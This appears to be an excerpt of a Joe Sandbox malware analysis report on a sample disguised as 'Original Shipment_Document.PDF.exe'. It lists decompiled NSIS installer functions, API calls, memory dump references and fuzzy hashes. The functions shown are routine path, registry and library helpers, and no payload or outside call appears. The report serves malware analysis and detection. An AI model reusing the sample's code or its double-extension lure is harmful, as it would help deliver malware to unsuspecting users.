                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                • Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
                                                • Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                • Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 53%
                                                			E00405EDE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406507(0x425f10, _a4);
				_t21 = E00405E81(0x425f10);
				if(_t21 != 0) {
					E0040678E(_t21);
					if(( *0x42a238 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f10 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f10);
							_push(0x425f10);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040683D();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E22(0x425f10);
								continue;
							} else {
								goto L1;
							}
						}
						E00405DD6();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                0x00405eea
                                                0x00405ef5
                                                0x00405ef9
                                                0x00405f00
                                                0x00405f0c
                                                0x00405f1c
                                                0x00405f1e
                                                0x00405f36
                                                0x00405f37
                                                0x00405f3e
                                                0x00405f3f
                                                0x00000000
                                                0x00000000
                                                0x00405f22
                                                0x00405f29
                                                0x00405f31
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f29
                                                0x00405f41
                                                0x00000000
                                                0x00405f55
                                                0x00405f0e
                                                0x00405f14
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f14
                                                0x00405efb
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                  • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
                                                • GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F47
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3248276644-3916508600
                                                • Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                • Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
                                                • Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                • Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004054DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 89%
                                                			E004054DD(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x4236f4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x4236f4 = _t16;
							E00404E9E();
						}
						L11:
						return CallWindowProcW( *0x4236fc, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E1E(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044AF(0x413);
				return 0;
			}





                                                0x004054e1
                                                0x004054eb
                                                0x00405507
                                                0x00405529
                                                0x0040552c
                                                0x00405532
                                                0x0040553c
                                                0x0040553d
                                                0x0040553f
                                                0x00405545
                                                0x00405545
                                                0x0040554f
                                                0x00000000
                                                0x0040555d
                                                0x00405514
                                                0x0040554c
                                                0x0040554c
                                                0x00000000
                                                0x0040554c
                                                0x00405520
                                                0x00405522
                                                0x00000000
                                                0x00405522
                                                0x004054f1
                                                0x00000000
                                                0x00000000
                                                0x004054f8
                                                0x00000000

                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 0040550C
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
                                                  • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                • Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
                                                • Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                • Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004063D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E004063D5(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E00406374(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                0x004063e3
                                                0x004063e5
                                                0x004063fd
                                                0x00406402
                                                0x00406407
                                                0x00406445
                                                0x00406445
                                                0x00406409
                                                0x0040641b
                                                0x00406426
                                                0x0040642c
                                                0x00406437
                                                0x00000000
                                                0x00000000
                                                0x00406437
                                                0x0040644b

                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,0040663C,80000002), ref: 0040641B
                                                • RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll), ref: 00406426
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: Call
                                                • API String ID: 3356406503-1824292864
                                                • Opcode ID: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
                                                • Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
                                                • Opcode Fuzzy Hash: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
                                                • Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403B21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00403B21() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x4216cc;
				_t3 = E00403B06(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x4216cc =  *0x4216cc & 0x00000000;
				return _t3;
			}







                                                0x00403b22
                                                0x00403b2a
                                                0x00403b31
                                                0x00403b34
                                                0x00403b34
                                                0x00403b36
                                                0x00403b3b
                                                0x00403b42
                                                0x00403b48
                                                0x00403b4c
                                                0x00403b4d
                                                0x00403b55

                                                APIs
                                                • FreeLibrary.KERNEL32(?,7620FAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
                                                • GlobalFree.KERNEL32 ref: 00403B42
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-3916508600
                                                • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                • Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
                                                • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                • Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405E22 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E00405E22(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                0x00405e23
                                                0x00405e2d
                                                0x00405e30
                                                0x00405e36
                                                0x00405e37
                                                0x00405e38
                                                0x00405e40
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405e40
                                                0x00405e42
                                                0x00405e4a

                                                APIs
                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Original Shipment_Document.PDF.exe,C:\Users\user\Desktop\Original Shipment_Document.PDF.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405E28
                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Original Shipment_Document.PDF.exe,C:\Users\user\Desktop\Original Shipment_Document.PDF.exe,80000000,00000003), ref: 00405E38
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-1669384263
                                                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                • Instruction ID: b9880c769af8d41d832fb6ed8dc33ce50b4fd52cea508e3b62d11b70b6cf9f92
                                                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                • Instruction Fuzzy Hash: 98D0A7B3410D20AEC3126B04EC04D9F73ACFF5130078A4427F581A71A4D7785D818EEC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405F5C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405F5C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                0x00405f6c
                                                0x00405f6e
                                                0x00405f71
                                                0x00405f9d
                                                0x00405f76
                                                0x00405f7f
                                                0x00405f84
                                                0x00405f8f
                                                0x00405f92
                                                0x00405fae
                                                0x00405f94
                                                0x00405f9b
                                                0x00000000
                                                0x00405f9b
                                                0x00405fa7
                                                0x00405fab
                                                0x00405fab
                                                0x00405fa5
                                                0x00000000

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F84
                                                • CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%